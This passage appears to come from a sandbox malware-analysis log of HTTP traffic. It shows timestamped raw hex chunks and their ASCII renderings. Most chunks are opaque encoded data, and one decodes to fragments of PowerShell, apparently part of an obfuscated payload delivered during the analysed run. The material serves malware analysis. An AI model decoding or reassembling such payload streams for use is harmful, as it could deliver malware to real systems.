34 38 33 35 41 41 35 43 45 31
                            Data Ascii: 1A65E12E96578CAEF7D9FA65428525D-C94F5F898A59A9867F566FE3A7B59C3B9D4288-AD647DDAEBE3A7C5851-DDD34993B8D-9914155B72ADF3329CD8-4421E169EA6854B1BAAC5AEF-BD49-4E7A876D5445DBE49B43F393A763DA833AC83A85C991EEE6-F6344-A3BA7991F5A4497F7C21A58EBDC98F4D4B5F4835AA5CE1
                            2021-09-14 19:32:54 UTC293INData Raw: 34 32 41 38 43 2d 32 33 44 2d 36 45 31 38 37 46 35 42 39 43 36 38 37 42 31 31 35 42 38 36 2d 42 39 33 46 41 44 42 41 38 43 45 37 35 2d 41 32 33 36 2d 35 46 35 43 36 2d 2d 41 46 38 35 42 31 45 42 33 2d 41 38 42 44 46 2d 37 39 35 36 36 43 31 34 2d 38 41 34 33 42 43 2d 32 36 34 44 38 42 33 46 36 39 36 38 31 34 34 33 33 32 32 31 46 42 37 35 45 39 39 31 46 2d 44 45 33 2d 35 35 38 2d 32 37 2d 34 38 44 41 41 43 39 39 46 46 46 34 31 35 46 34 36 41 45 38 39 43 34 2d 44 31 35 44 43 36 2d 2d 33 37 42 44 43 42 43 45 33 38 43 43 43 43 31 35 38 43 2d 44 34 34 32 34 31 32 34 41 39 35 2d 34 39 45 32 44 37 45 44 46 41 37 45 38 41 43 31 45 37 44 31 35 42 41 38 2d 45 35 45 46 43 32 38 33 36 45 33 46 43 39 44 31 41 45 44 43 43 43 31 43 37 44 46 2d 2d 45 45 34 44 37 44 42 36
                            Data Ascii: 42A8C-23D-6E187F5B9C687B115B86-B93FADBA8CE75-A236-5F5C6--AF85B1EB3-A8BDF-79566C14-8A43BC-264D8B3F696814433221FB75E991F-DE3-558-27-48DAAC99FFF415F46AE89C4-D15DC6--37BDCBCE38CCCC158C-D4424124A95-49E2D7EDFA7E8AC1E7D15BA8-E5EFC2836E3FC9D1AEDCCC1C7DF--EE4D7DB6
                            2021-09-14 19:32:54 UTC301INData Raw: 42 35 38 37 2d 42 36 46 34 46 41 33 41 44 31 38 32 37 2d 38 34 2d 42 33 45 38 37 32 42 43 34 32 38 42 39 33 37 42 34 34 31 36 46 44 2d 31 34 44 38 45 36 39 2d 2d 42 36 32 35 43 31 46 33 32 42 31 45 39 43 44 31 33 32 36 35 33 35 45 36 43 32 46 36 39 32 36 2d 44 35 35 37 33 34 39 43 46 2d 2d 32 36 2d 46 38 45 38 46 2d 41 39 41 41 41 38 43 42 31 2d 42 35 41 37 34 43 33 39 35 38 45 2d 37 36 41 38 2d 39 33 45 31 33 32 31 35 38 41 38 2d 32 42 34 37 39 37 43 2d 2d 44 41 37 33 46 34 33 36 34 39 46 32 42 39 33 42 44 43 36 38 37 35 32 35 31 2d 32 39 39 37 32 39 43 34 46 41 31 42 44 33 43 44 34 31 31 34 39 38 34 32 33 32 38 32 42 37 34 2d 42 39 45 45 33 41 45 2d 37 46 33 35 32 32 33 35 31 39 35 31 31 46 41 33 33 36 46 31 31 34 31 39 34 36 43 35 41 44 33 46 36 34 39
                            Data Ascii: B587-B6F4FA3AD1827-84-B3E872BC428B937B4416FD-14D8E69--B625C1F32B1E9CD1326535E6C2F6926-D557349CF--26-F8E8F-A9AAA8CB1-B5A74C3958E-76A8-93E132158A8-2B4797C--DA73F43649F2B93BDC6875251-299729C4FA1BD3CD411498423282B74-B9EE3AE-7F35223519511FA336F1141946C5AD3F649
                            2021-09-14 19:32:54 UTC308INData Raw: 39 41 38 32 46 35 2d 45 34 34 46 34 31 42 39 2d 2d 36 45 41 38 41 36 34 39 37 37 45 41 37 44 44 34 45 33 45 37 32 37 35 33 37 35 31 46 2d 41 35 39 45 46 37 43 43 46 39 42 46 36 39 31 45 44 2d 42 45 46 46 36 41 43 39 2d 35 2d 33 35 32 35 45 44 38 45 46 35 46 33 33 46 33 43 44 31 37 41 46 33 43 42 41 37 45 39 35 38 34 36 32 41 33 46 32 2d 44 36 43 39 43 46 31 43 42 42 2d 35 41 41 36 35 35 2d 32 42 46 35 37 2d 42 43 36 45 36 34 35 32 38 44 34 41 45 38 39 33 36 2d 44 38 2d 46 42 33 41 46 32 37 42 42 43 31 32 43 43 36 39 37 41 45 38 36 39 44 34 33 2d 34 32 45 31 2d 41 44 46 36 33 37 33 31 2d 34 46 34 36 38 43 44 44 33 35 2d 39 46 36 39 32 33 45 32 38 46 35 43 42 38 36 39 39 35 36 35 45 37 39 45 33 36 2d 36 43 32 44 42 31 38 34 41 38 32 42 41 32 33 31 32 34 46
                            Data Ascii: 9A82F5-E44F41B9--6EA8A64977EA7DD4E3E72753751F-A59EF7CCF9BF691ED-BEFF6AC9-5-3525ED8EF5F33F3CD17AF3CBA7E958462A3F2-D6C9CF1CBB-5AA655-2BF57-BC6E64528D4AE8936-D8-FB3AF27BBC12CC697AE869D43-42E1-ADF63731-4F468CDD35-9F6923E28F5CB8699565E79E36-6C2DB184A82BA23124F
                            2021-09-14 19:32:54 UTC315INData Raw: 39 43 38 34 32 34 44 36 41 44 38 39 37 37 44 31 34 37 31 37 36 32 46 41 31 43 34 33 39 41 45 35 32 36 44 32 38 45 43 34 35 2d 41 2d 33 37 45 31 42 41 31 43 39 2d 35 33 31 35 2d 38 32 2d 36 33 39 43 38 46 46 36 36 37 43 31 43 43 39 45 43 33 45 45 33 2d 34 45 38 35 39 35 42 34 38 31 35 33 37 39 32 33 46 35 37 44 33 35 39 37 36 34 41 46 33 43 44 43 43 36 37 39 34 37 39 37 31 43 35 44 38 38 44 38 35 42 34 38 39 43 36 2d 42 36 41 38 2d 44 32 37 33 39 45 45 38 33 37 43 34 36 46 45 35 38 35 45 39 39 44 38 36 36 32 42 37 37 39 32 33 34 36 37 45 44 2d 41 44 42 2d 2d 2d 35 38 38 42 41 32 36 39 39 38 33 37 43 45 2d 32 46 34 43 42 31 35 42 35 33 46 39 37 45 35 45 43 44 45 45 32 45 39 37 33 31 41 46 46 46 43 39 33 35 33 46 41 37 34 43 33 35 39 34 39 35 35 39 31 36 35
                            Data Ascii: 9C8424D6AD8977D1471762FA1C439AE526D28EC45-A-37E1BA1C9-5315-82-639C8FF667C1CC9EC3EE3-4E8595B481537923F57D359764AF3CDCC67947971C5D88D85B489C6-B6A8-D2739EE837C46FE585E99D8662B77923467ED-ADB---588BA2699837CE-2F4CB15B53F97E5ECDEE2E9731AFFFC9353FA74C35949559165
                            2021-09-14 19:32:54 UTC322INData Raw: 43 33 31 31 42 35 37 38 37 46 43 45 41 42 39 35 35 36 45 35 38 45 36 36 34 32 32 38 38 36 44 32 31 41 36 33 34 38 32 37 42 2d 32 41 39 31 31 41 33 35 31 32 42 34 33 39 35 34 45 36 43 38 33 37 42 35 36 35 2d 36 32 32 35 38 44 34 36 43 36 41 35 36 32 46 45 43 31 37 2d 44 45 32 44 31 31 39 33 32 44 35 43 42 37 2d 32 41 44 41 37 45 41 43 2d 46 34 32 39 45 46 44 45 37 45 38 38 35 35 45 37 34 2d 45 35 37 38 2d 45 31 46 33 45 45 43 46 31 43 41 45 42 45 39 36 38 42 46 42 2d 43 45 38 35 34 46 46 43 44 36 44 43 39 38 32 37 37 42 38 42 35 33 44 35 36 37 32 45 41 45 37 32 39 33 42 39 36 38 45 34 33 46 38 42 42 39 42 39 42 34 45 38 37 43 43 34 45 37 36 35 34 45 41 2d 39 38 33 42 45 31 35 43 45 38 37 39 43 37 33 44 42 35 38 46 35 46 31 36 42 46 46 45 45 33 31 33 45 39
                            Data Ascii: C311B5787FCEAB9556E58E66422886D21A634827B-2A911A3512B43954E6C837B565-62258D46C6A562FEC17-DE2D11932D5CB7-2ADA7EAC-F429EFDE7E8855E74-E578-E1F3EECF1CAEBE968BFB-CE854FFCD6DC98277B8B53D5672EAE7293B968E43F8BB9B9B4E87CC4E7654EA-983BE15CE879C73DB58F5F16BFFEE313E9
                            2021-09-14 19:32:54 UTC330INData Raw: 34 34 41 34 33 32 38 42 44 2d 33 44 43 32 34 35 32 44 39 42 37 31 46 46 44 43 37 32 32 44 46 39 42 34 34 33 36 46 35 39 33 38 37 35 46 44 32 38 39 44 43 35 38 37 34 34 32 39 31 31 2d 33 44 32 31 38 38 41 46 42 41 42 31 37 43 46 38 34 45 34 2d 45 31 46 43 41 35 33 35 42 44 2d 32 35 35 45 46 39 41 43 2d 35 37 32 45 37 44 45 36 39 42 36 31 2d 34 31 35 37 46 44 44 41 37 43 46 38 32 41 45 42 44 43 41 43 43 33 2d 37 34 41 38 37 38 33 45 44 32 45 2d 45 32 38 38 33 39 46 43 36 31 42 42 37 38 44 41 33 38 43 44 34 34 35 31 36 36 32 45 31 42 37 44 37 39 45 32 45 34 43 35 38 31 44 39 42 32 37 39 46 34 31 35 42 31 39 31 41 2d 35 39 31 44 32 43 38 32 34 43 46 31 41 42 35 2d 39 42 46 31 31 2d 46 36 46 33 45 35 34 33 32 34 37 39 36 37 2d 35 39 39 32 33 34 36 39 45 32 2d
                            Data Ascii: 44A4328BD-3DC2452D9B71FFDC722DF9B4436F593875FD289DC587442911-3D2188AFBAB17CF84E4-E1FCA535BD-255EF9AC-572E7DE69B61-4157FDDA7CF82AEBDCACC3-74A8783ED2E-E28839FC61BB78DA38CD4451662E1B7D79E2E4C581D9B279F415B191A-591D2C824CF1AB5-9BF11-F6F3E543247967-59923469E2-
                            2021-09-14 19:32:54 UTC337INData Raw: 43 44 35 38 44 32 33 41 42 32 2d 33 46 36 32 43 36 44 2d 39 43 41 44 36 45 38 35 46 42 41 35 45 42 45 42 34 33 43 39 34 46 42 31 46 39 32 33 33 34 32 38 32 43 2d 37 34 36 2d 38 37 46 37 34 44 43 42 35 46 34 44 32 34 45 32 36 37 32 41 2d 44 32 38 46 46 32 45 46 44 33 2d 33 41 38 46 36 43 46 42 37 34 41 32 31 42 34 36 39 42 35 34 44 31 34 42 35 41 42 44 45 33 43 31 39 33 43 37 43 37 2d 46 2d 36 39 38 35 33 39 38 46 32 41 35 36 33 42 45 31 34 43 34 45 34 43 2d 38 2d 33 43 39 39 38 38 45 33 34 36 37 41 33 31 36 34 34 44 45 36 33 2d 32 45 39 38 35 42 34 36 43 32 42 46 46 43 36 45 45 34 38 2d 31 35 45 31 38 42 35 35 42 41 36 38 42 39 42 45 43 34 41 38 35 41 44 41 46 36 31 2d 43 39 31 38 33 37 36 39 43 42 41 33 44 31 45 44 32 44 36 2d 45 44 45 37 34 43 46 31 43
                            Data Ascii: CD58D23AB2-3F62C6D-9CAD6E85FBA5EBEB43C94FB1F92334282C-746-87F74DCB5F4D24E2672A-D28FF2EFD3-3A8F6CFB74A21B469B54D14B5ABDE3C193C7C7-F-6985398F2A563BE14C4E4C-8-3C9988E3467A31644DE63-2E985B46C2BFFC6EE48-15E18B55BA68B9BEC4A85ADAF61-C9183769CBA3D1ED2D6-EDE74CF1C
                            2021-09-14 19:32:54 UTC344INData Raw: 45 37 41 35 39 41 46 33 42 42 32 32 35 37 42 36 2d 41 37 35 34 42 43 43 37 43 32 38 44 44 36 41 34 31 36 46 35 39 31 33 43 34 42 44 33 44 37 44 39 41 42 32 36 34 37 34 44 36 31 43 32 43 45 46 46 41 39 46 32 33 39 2d 44 32 42 34 34 44 33 43 36 34 31 32 46 43 44 35 33 33 42 36 31 44 34 46 41 31 31 37 34 46 32 42 36 36 37 46 2d 45 31 32 33 31 32 31 31 38 42 46 33 43 32 41 32 35 43 45 34 31 31 32 2d 33 44 46 2d 42 34 31 37 37 44 2d 41 34 44 33 45 32 44 37 33 36 36 45 32 42 2d 35 44 42 45 35 2d 34 43 39 45 2d 42 44 43 31 37 38 35 2d 34 45 36 43 37 42 45 2d 33 33 38 37 43 42 38 41 31 42 32 36 35 2d 2d 43 41 32 35 43 46 34 32 32 33 2d 38 41 44 46 38 37 33 37 45 44 32 43 31 45 36 2d 35 36 43 34 2d 46 34 2d 32 32 32 38 46 2d 35 37 35 38 41 38 34 32 43 2d 38 2d 38
                            Data Ascii: E7A59AF3BB2257B6-A754BCC7C28DD6A416F5913C4BD3D7D9AB26474D61C2CEFFA9F239-D2B44D3C6412FCD533B61D4FA1174F2B667F-E12312118BF3C2A25CE4112-3DF-B4177D-A4D3E2D7366E2B-5DBE5-4C9E-BDC1785-4E6C7BE-3387CB8A1B265--CA25CF4223-8ADF8737ED2C1E6-56C4-F4-2228F-5758A842C-8-8
                            2021-09-14 19:32:54 UTC351INData Raw: 41 32 34 32 34 43 32 41 44 31 45 34 35 33 31 43 34 44 31 34 46 36 31 38 35 2d 45 43 34 31 46 2d 43 34 43 38 39 42 37 34 37 34 43 38 36 36 41 37 36 32 45 32 2d 32 2d 46 44 43 35 2d 37 33 38 37 35 37 33 42 38 36 37 37 42 37 32 38 35 39 41 2d 33 44 38 34 36 38 36 35 37 44 36 32 45 37 38 41 33 39 39 33 2d 39 43 32 44 36 45 43 33 41 45 33 45 35 38 46 41 2d 46 35 39 32 43 39 34 2d 41 34 33 45 45 41 45 41 42 33 41 34 31 31 33 33 38 35 45 46 33 43 45 38 35 46 39 2d 36 2d 44 39 46 46 42 44 34 36 42 35 38 43 36 45 33 39 39 2d 2d 43 31 33 41 37 39 39 32 45 45 34 34 42 31 42 42 45 45 43 46 34 34 36 42 33 41 41 32 43 32 43 36 45 35 43 38 39 44 41 43 39 45 45 32 33 44 32 43 41 39 46 32 34 46 35 44 32 34 2d 2d 44 45 32 31 44 44 44 2d 33 38 43 33 32 36 33 32 44 36 2d 34
                            Data Ascii: A2424C2AD1E4531C4D14F6185-EC41F-C4C89B7474C866A762E2-2-FDC5-7387573B8677B72859A-3D8468657D62E78A3993-9C2D6EC3AE3E58FA-F592C94-A43EEAEAB3A4113385EF3CE85F9-6-D9FFBD46B58C6E399--C13A7992EE44B1BBEECF446B3AA2C2C6E5C89DAC9EE23D2CA9F24F5D24--DE21DDD-38C32632D6-4
                            2021-09-14 19:32:54 UTC359INData Raw: 43 38 31 45 46 32 35 37 36 46 38 45 35 46 38 39 35 41 34 46 39 46 39 35 31 34 2d 32 34 2d 43 38 33 2d 41 34 33 45 31 37 45 31 37 34 43 42 2d 35 39 37 42 44 37 37 45 44 43 31 39 44 38 32 43 45 2d 2d 45 45 41 35 46 38 41 32 42 34 38 34 43 41 42 42 38 38 46 42 45 34 31 44 32 43 2d 34 43 36 39 2d 44 31 42 42 2d 46 38 43 39 31 31 32 31 32 33 43 38 37 45 36 32 31 45 39 35 46 44 42 37 33 44 34 36 34 34 31 32 38 31 39 33 41 32 44 35 41 32 31 35 46 33 38 37 34 34 2d 41 35 38 42 43 38 33 37 37 38 34 45 43 45 45 36 44 46 32 46 31 43 45 2d 34 41 37 33 45 34 32 42 36 43 34 41 41 39 2d 31 42 39 2d 42 35 39 35 32 32 38 2d 36 46 45 46 38 37 46 2d 46 41 45 33 45 38 43 46 38 2d 41 37 43 37 2d 46 36 41 45 37 43 45 41 31 36 35 35 34 42 44 39 42 43 38 38 41 44 36 34 39 34 2d
                            Data Ascii: C81EF2576F8E5F895A4F9F9514-24-C83-A43E17E174CB-597BD77EDC19D82CE--EEA5F8A2B484CABB88FBE41D2C-4C69-D1BB-F8C9112123C87E621E95FDB73D4644128193A2D5A215F38744-A58BC837784ECEE6DF2F1CE-4A73E42B6C4AA9-1B9-B595228-6FEF87F-FAE3E8CF8-A7C7-F6AE7CEA16554BD9BC88AD6494-
                            2021-09-14 19:32:54 UTC366INData Raw: 45 39 45 35 41 41 42 41 2d 34 34 44 31 38 35 37 41 41 43 31 36 37 44 46 42 42 41 36 45 38 34 38 44 32 36 31 31 35 34 43 42 41 37 36 41 42 31 34 45 45 44 45 45 45 43 32 41 39 45 39 33 38 33 31 36 41 35 31 36 37 36 45 39 44 46 32 45 35 43 42 39 33 39 32 43 33 31 45 42 36 31 34 31 32 43 34 33 41 2d 41 33 45 34 46 46 38 43 34 43 37 31 35 39 31 33 46 2d 44 38 45 35 39 44 36 38 2d 38 37 35 32 36 41 44 38 35 43 32 32 37 46 39 45 41 43 45 37 44 33 42 44 36 34 42 37 45 33 42 39 37 2d 36 34 32 46 34 2d 39 46 31 46 37 36 2d 2d 44 46 42 41 38 33 44 41 38 39 42 35 41 32 34 33 42 42 32 31 41 41 33 35 32 43 32 43 36 39 35 42 43 34 45 2d 46 38 32 33 32 45 39 39 32 31 34 38 35 42 36 2d 33 36 31 45 37 35 35 32 44 41 32 43 33 2d 35 34 2d 32 32 39 34 37 43 2d 43 31 31 35 36
                            Data Ascii: E9E5AABA-44D1857AAC167DFBBA6E848D261154CBA76AB14EEDEEEC2A9E938316A51676E9DF2E5CB9392C31EB61412C43A-A3E4FF8C4C715913F-D8E59D68-87526AD85C227F9EACE7D3BD64B7E3B97-642F4-9F1F76--DFBA83DA89B5A243BB21AA352C2C695BC4E-F8232E9921485B6-361E7552DA2C3-54-22947C-C1156
                            2021-09-14 19:32:54 UTC373INData Raw: 2d 45 45 39 35 41 39 45 35 39 2d 39 36 34 41 44 43 34 42 45 34 32 36 31 31 45 32 42 38 32 39 41 46 37 41 42 33 46 43 34 36 38 33 43 31 37 41 41 36 33 37 41 45 38 44 46 33 34 34 42 41 31 32 43 31 46 39 44 34 43 36 41 35 35 41 39 42 32 38 45 32 31 2d 42 45 43 34 33 36 46 43 43 46 44 38 35 31 32 34 41 33 41 33 35 38 41 41 44 34 37 31 37 45 37 38 33 39 36 34 43 42 36 44 2d 44 42 38 32 41 37 46 36 39 31 42 33 44 32 34 39 2d 36 46 34 42 37 42 37 46 36 39 33 42 41 38 44 35 41 43 45 45 32 32 41 36 32 46 45 42 32 42 32 42 32 32 35 33 44 44 35 36 39 38 35 38 35 33 45 37 37 43 35 36 42 36 35 45 34 32 32 37 44 37 32 38 31 2d 34 36 41 35 34 32 33 46 37 36 38 34 39 43 34 31 35 42 32 31 46 39 39 37 41 36 35 44 35 34 41 31 42 46 44 46 38 46 35 42 45 43 34 33 39 34 41 35
                            Data Ascii: -EE95A9E59-964ADC4BE42611E2B829AF7AB3FC4683C17AA637AE8DF344BA12C1F9D4C6A55A9B28E21-BEC436FCCFD85124A3A358AAD4717E783964CB6D-DB82A7F691B3D249-6F4B7B7F693BA8D5ACEE22A62FEB2B2B2253DD56985853E77C56B65E4227D7281-46A5423F76849C415B21F997A65D54A1BFDF8F5BEC4394A5
                            2021-09-14 19:32:54 UTC380INData Raw: 44 42 37 42 32 35 33 35 36 39 46 39 43 42 32 42 46 43 35 31 36 38 32 2d 2d 45 44 43 46 33 45 38 43 46 37 45 39 35 36 45 34 32 46 36 44 42 32 32 36 41 31 39 34 33 44 31 41 46 32 36 37 37 2d 39 36 32 38 35 43 37 38 42 42 42 37 44 37 33 36 31 44 31 39 2d 34 2d 46 34 41 37 34 33 32 37 36 44 35 39 41 35 33 2d 34 42 45 42 43 35 33 44 31 39 43 41 42 33 41 35 37 37 43 39 33 45 46 41 44 31 35 35 33 46 31 37 32 2d 38 43 36 41 36 45 33 35 35 45 43 34 31 41 32 44 45 32 42 37 39 43 37 33 42 38 35 38 43 31 44 38 42 33 31 45 33 37 46 46 33 43 34 33 43 35 31 44 31 35 39 37 37 45 42 38 45 45 44 41 34 42 36 39 37 31 43 45 44 37 37 37 45 43 36 2d 36 38 33 2d 31 42 31 33 31 44 45 46 41 32 38 43 37 42 33 43 35 33 34 37 44 45 36 31 39 43 33 35 45 42 44 32 32 2d 38 42 44 45 42
                            Data Ascii: DB7B253569F9CB2BFC51682--EDCF3E8CF7E956E42F6DB226A1943D1AF2677-96285C78BBB7D7361D19-4-F4A743276D59A53-4BEBC53D19CAB3A577C93EFAD1553F172-8C6A6E355EC41A2DE2B79C73B858C1D8B31E37FF3C43C51D15977EB8EEDA4B6971CED777EC6-683-1B131DEFA28C7B3C5347DE619C35EBD22-8BDEB
                            2021-09-14 19:32:54 UTC387INData Raw: 42 34 41 43 34 34 41 43 37 31 39 37 42 38 32 2d 2d 31 39 37 31 34 43 46 32 41 31 35 35 32 43 38 46 32 33 2d 43 39 43 38 35 31 2d 41 38 46 39 43 33 38 35 33 41 2d 45 44 42 37 31 37 46 43 45 36 42 35 45 2d 42 32 44 38 32 2d 43 35 35 42 41 42 31 36 2d 35 39 31 37 41 35 34 34 43 33 35 46 43 46 34 2d 38 44 38 38 33 45 46 39 32 34 46 36 43 2d 33 36 31 42 41 46 31 35 42 45 31 44 33 31 39 43 34 35 32 33 32 32 31 37 45 37 45 42 43 44 38 34 37 46 32 39 35 43 36 32 32 46 32 44 38 45 45 35 46 37 44 37 39 36 35 32 42 43 45 37 36 45 43 42 33 37 2d 44 45 34 38 42 44 2d 31 43 39 38 36 45 45 39 46 43 43 36 37 31 31 42 36 33 32 32 44 45 46 32 45 42 44 35 37 35 37 46 44 32 39 45 36 45 32 42 39 44 43 33 34 38 32 32 37 2d 44 38 36 39 32 43 44 41 31 32 37 37 35 35 2d 41 39 39
                            Data Ascii: B4AC44AC7197B82--19714CF2A1552C8F23-C9C851-A8F9C3853A-EDB717FCE6B5E-B2D82-C55BAB16-5917A544C35FCF4-8D883EF924F6C-361BAF15BE1D319C45232217E7EBCD847F295C622F2D8EE5F7D79652BCE76ECB37-DE48BD-1C986EE9FCC6711B6322DEF2EBD5757FD29E6E2B9DC348227-D8692CDA127755-A99
                            2021-09-14 19:32:54 UTC395INData Raw: 46 44 2d 38 2d 37 31 35 41 33 41 31 36 39 43 45 46 2d 36 35 46 41 44 37 41 36 34 45 45 45 42 32 46 32 36 42 2d 33 38 2d 34 31 41 46 46 42 33 38 43 36 44 31 2d 31 31 43 45 31 35 43 2d 44 34 46 34 34 35 39 39 42 2d 43 31 36 38 2d 44 34 33 31 44 43 41 46 35 41 39 39 44 34 33 37 32 43 38 33 42 31 32 42 2d 43 33 33 32 44 34 33 32 42 46 39 37 39 2d 2d 34 41 43 44 39 31 39 34 46 32 39 32 38 44 2d 43 39 37 44 43 42 45 35 42 34 31 32 42 38 43 38 33 38 44 34 33 44 2d 42 35 36 46 35 43 36 2d 36 33 44 41 41 34 41 39 35 45 44 31 43 46 33 43 39 34 33 45 39 43 42 41 36 35 2d 33 39 37 35 44 36 2d 44 39 31 43 37 39 34 35 33 2d 45 31 39 34 46 36 37 39 34 39 41 41 35 34 38 46 46 46 33 34 31 38 2d 44 31 38 31 32 35 31 2d 32 43 37 37 42 44 45 41 41 41 46 42 35 2d 46 45 43 43
                            Data Ascii: FD-8-715A3A169CEF-65FAD7A64EEEB2F26B-38-41AFFB38C6D1-11CE15C-D4F44599B-C168-D431DCAF5A99D4372C83B12B-C332D432BF979--4ACD9194F2928D-C97DCBE5B412B8C838D43D-B56F5C6-63DAA4A95ED1CF3C943E9CBA65-3975D6-D91C79453-E194F67949AA548FFF3418-D181251-2C77BDEAAAFB5-FECC
                            2021-09-14 19:32:54 UTC402INData Raw: 45 37 45 39 37 32 44 46 46 45 45 35 36 38 39 2d 39 37 41 37 32 33 33 45 36 37 35 45 37 2d 36 42 42 46 44 46 39 43 45 36 41 39 35 43 41 36 34 41 42 38 31 46 33 36 38 45 33 34 37 41 33 37 45 37 43 31 37 33 36 2d 31 35 34 46 42 31 43 33 38 42 31 39 46 38 41 35 39 36 43 2d 34 43 41 42 43 32 44 32 41 33 33 46 37 32 32 31 43 33 43 45 34 31 41 46 34 41 31 33 36 43 2d 45 43 44 35 45 36 41 43 2d 38 43 45 31 37 39 31 32 45 42 45 45 44 42 33 44 31 34 31 43 35 35 32 42 2d 44 34 33 37 33 41 42 35 36 31 42 44 38 32 38 41 45 2d 46 36 33 39 36 38 42 38 45 33 38 2d 44 43 43 41 45 45 41 46 41 33 2d 42 31 43 36 36 41 32 43 46 35 44 42 33 41 32 32 37 37 39 36 43 41 34 41 35 2d 44 43 43 42 2d 36 41 45 46 44 33 43 2d 34 34 39 32 44 41 36 37 33 36 32 45 2d 44 39 45 37 42 32 41
                            Data Ascii: E7E972DFFEE5689-97A7233E675E7-6BBFDF9CE6A95CA64AB81F368E347A37E7C1736-154FB1C38B19F8A596C-4CABC2D2A33F7221C3CE41AF4A136C-ECD5E6AC-8CE17912EBEEDB3D141C552B-D4373AB561BD828AE-F63968B8E38-DCCAEEAFA3-B1C66A2CF5DB3A227796CA4A5-DCCB-6AEFD3C-4492DA67362E-D9E7B2A
                            2021-09-14 19:32:54 UTC409INData Raw: 42 38 2d 41 43 43 2d 35 33 39 37 45 39 41 32 43 32 37 33 35 43 38 41 42 41 46 41 2d 38 34 38 36 43 39 42 34 45 39 31 34 39 38 31 33 32 36 45 36 39 42 38 42 33 2d 2d 46 34 41 34 38 35 41 46 36 2d 46 45 43 43 44 42 32 45 43 35 36 41 31 34 41 42 39 37 37 42 46 45 32 45 38 37 44 31 38 32 41 33 2d 44 2d 37 43 2d 36 31 32 36 45 32 39 46 44 31 46 36 43 45 44 33 45 39 42 36 32 33 33 31 33 33 34 43 39 32 33 33 31 44 32 35 31 46 44 2d 43 46 43 45 38 33 31 45 45 37 41 37 32 33 41 42 44 44 36 45 2d 32 37 42 46 42 42 32 41 43 31 45 45 37 32 37 33 32 2d 33 33 45 31 2d 45 33 34 37 44 33 38 2d 33 34 34 42 42 38 31 38 37 32 33 44 41 36 46 46 39 44 38 37 41 45 34 46 34 36 43 36 2d 42 43 38 39 39 35 33 39 31 31 36 34 43 38 37 43 36 41 34 34 45 35 35 37 46 44 34 36 43 34 36
                            Data Ascii: B8-ACC-5397E9A2C2735C8ABAFA-8486C9B4E914981326E69B8B3--F4A485AF6-FECCDB2EC56A14AB977BFE2E87D182A3-D-7C-6126E29FD1F6CED3E9B62331334C92331D251FD-CFCE831EE7A723ABDD6E-27BFBB2AC1EE72732-33E1-E347D38-344BB818723DA6FF9D87AE4F46C6-BC8995391164C87C6A44E557FD46C46
                            2021-09-14 19:32:54 UTC416INData Raw: 2d 36 39 2d 36 65 2d 36 34 2d 36 39 2d 36 65 2d 36 37 2d 32 38 2d 32 39 2d 35 64 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 35 62 2d 34 66 2d 37 35 2d 37 34 2d 37 30 2d 37 35 2d 37 34 2d 35 34 2d 37 39 2d 37 30 2d 36 35 2d 32 38 2d 35 62 2d 36 32 2d 37 39 2d 37 34 2d 36 35 2d 35 62 2d 35 64 2d 35 64 2d 32 39 2d 35 64 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 37 30 2d 36 31 2d 37 32 2d 36 31 2d 36 64 2d 32 38 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 35 62 2d 35 30 2d 36 31 2d 37 32 2d 36 31 2d 36 64 2d 36 35 2d 37 34 2d 36 35 2d 37 32 2d 32 38 2d 34 64 2d 36 31 2d 36 65 2d 36 34 2d 36 31 2d 37 34 2d 36 66 2d 37 32 2d 37 39 2d 33 64 2d 32 34 2d 37 34 2d 37 32 2d 37 35 2d 36 35 2d 32 39 2d 35 64 2d 32 30
                            Data Ascii: -69-6e-64-69-6e-67-28-29-5d-0a-20-20-20-20-5b-4f-75-74-70-75-74-54-79-70-65-28-5b-62-79-74-65-5b-5d-5d-29-5d-0a-20-20-20-20-70-61-72-61-6d-28-0a-20-20-20-20-20-20-20-20-5b-50-61-72-61-6d-65-74-65-72-28-4d-61-6e-64-61-74-6f-72-79-3d-24-74-72-75-65-29-5d-20
                            2021-09-14 19:32:54 UTC424INData Raw: 33 31 2d 33 30 2d 33 36 2d 33 31 2d 34 36 2d 33 32 2d 33 39 2d 33 39 2d 33 34 2d 33 31 2d 33 33 2d 33 30 2d 33 37 2d 33 31 2d 33 36 2d 33 31 2d 33 33 2d 33 30 2d 33 38 2d 33 37 2d 34 35 2d 33 30 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 34 2d 33 30 2d 33 39 2d 33 37 2d 34 32 2d 33 30 2d 34 32 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 34 2d 33 31 2d 33 31 2d 33 30 2d 33 37 2d 33 31 2d 34 31 2d 34 34 2d 33 36 2d 33 31 2d 34 31 2d 34 34 2d 33 36 2d 33 31 2d 33 32 2d 33 30 2d 33 38 2d 33 31 2d 34 31 2d 33 31 2d 33 32 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 32 2d 33 34 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 31 2d 33 36 2d 34 36 2d 34 35 2d 33 30 2d 33 31 2d 33 31 2d 33 33 2d 33 31 2d 33 35 2d 33 31 2d 33 31 2d
                            Data Ascii: 31-30-36-31-46-32-39-39-34-31-33-30-37-31-36-31-33-30-38-37-45-30-38-30-30-30-30-30-34-30-39-37-42-30-42-30-30-30-30-30-34-31-31-30-37-31-41-44-36-31-41-44-36-31-32-30-38-31-41-31-32-30-30-36-46-32-34-30-30-30-30-30-36-31-36-46-45-30-31-31-33-31-35-31-31-
